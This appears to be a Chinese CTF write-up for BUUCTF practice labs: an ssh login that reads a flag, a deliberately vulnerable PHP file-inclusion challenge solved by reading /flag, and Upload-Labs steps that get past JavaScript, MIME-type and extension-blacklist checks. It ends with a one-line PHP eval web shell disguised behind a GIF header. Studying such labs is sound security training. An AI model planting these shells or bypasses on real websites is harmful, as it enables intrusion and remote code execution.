10.13:Basic Linux Labs ~ Upload-Labs-Linux
10.25:?
10.26:BUU CODE REVIEW 1 ~ Unencode
10.27:~ endl
目录
凯撒?替换?呵呵! ***好用的网站
Basic
Linux Labs
ssh -p 28309 root@node4.buuoj.cn
-p指定端口,root为用户名,@后为ip地址
第一次连接需要输入yes
ls ../
cat ../flag.txt
flag{2a02935d-b864-48c0-850c-f8f4ef1e11cd}
BUU LFI COURSE 1
<?php
/**
* Created by PhpStorm.
* User: jinzhao
* Date: 2019/7/9
* Time: 7:07 AM
*/
highlight_file(__FILE__);
if(isset($_GET['file'])) {
$str = $_GET['file'];
include $_GET['file'];
}
/?file=/flag
flag{5f9b3625-8aa8-46d4-89f5-7ba32d1cfab6}
Upload-Labs-Linux
phpinfo.php↓
<?php
phpinfo();
?>
pass-01:在客户端使用js进行验证
>solve1:
删除红框部分, 即可上传phpinfo.php
>solve2:
使用bp将所有js删除(代理-选项-相应操作-删除所有JavaScript)
未汉化版本是:Proxy-Options-Response Modification-Remove all JavaScript
然后上传phpinfo.php
>solve3:
上传phpinfo.png,bp拦截修改filename=“phpinfo.png”后缀名为.php
(看串了,发现pass-02也可以用,图在下面)
pass-02:MIME-Type验证
>solve1: ↑
MIME(Multipurpose Internet Mail Extensions)多用途互联网邮件扩展类型。是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问的时候,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。
常见的MIME类型(通用型):
超文本标记语言文本 .html text/html
xml文档 .xml text/xml
XHTML文档 .xhtml application/xhtml+xml
普通文本 .txt text/plain
RTF文本 .rtf application/rtf
PDF文档 .pdf application/pdf
Microsoft Word文件 .word application/msword
PNG图像 .png image/png
GIF图形 .gif image/gif
JPEG图形 .jpeg,.jpg image/jpeg
au声音文件 .au audio/basic
MIDI音乐文件 .mid,.midi audio/midi,audio/x-midi
RealAudio音乐文件 .ra, .ram audio/x-pn-realaudio
MPEG文件 .mpg,.mpeg video/mpeg
AVI文件 .avi video/x-msvideo
GZIP文件 .gz application/x-gzip
TAR文件 .tar application/x-tar
任意的二进制数据 application/octet-stream
>solve2:
Content-Type改成JPGE或者PNG对应的后缀名Type即可。
Pass-03:黑名单验证-后缀名
基于文件后缀名验证方式的分类:
1、基于白名单验证:只针对白名单中有的后缀名,文件才能上传成功。
2、基于黑名单验证:只针对黑名单中没有的后缀名,文件才能上传成功。
可以使用其他后缀名比如.php1,.php2,.phtml,.php5等。
try1:
shell.php5 ↓
GIF89a
<?php.eval($_POST[an])?>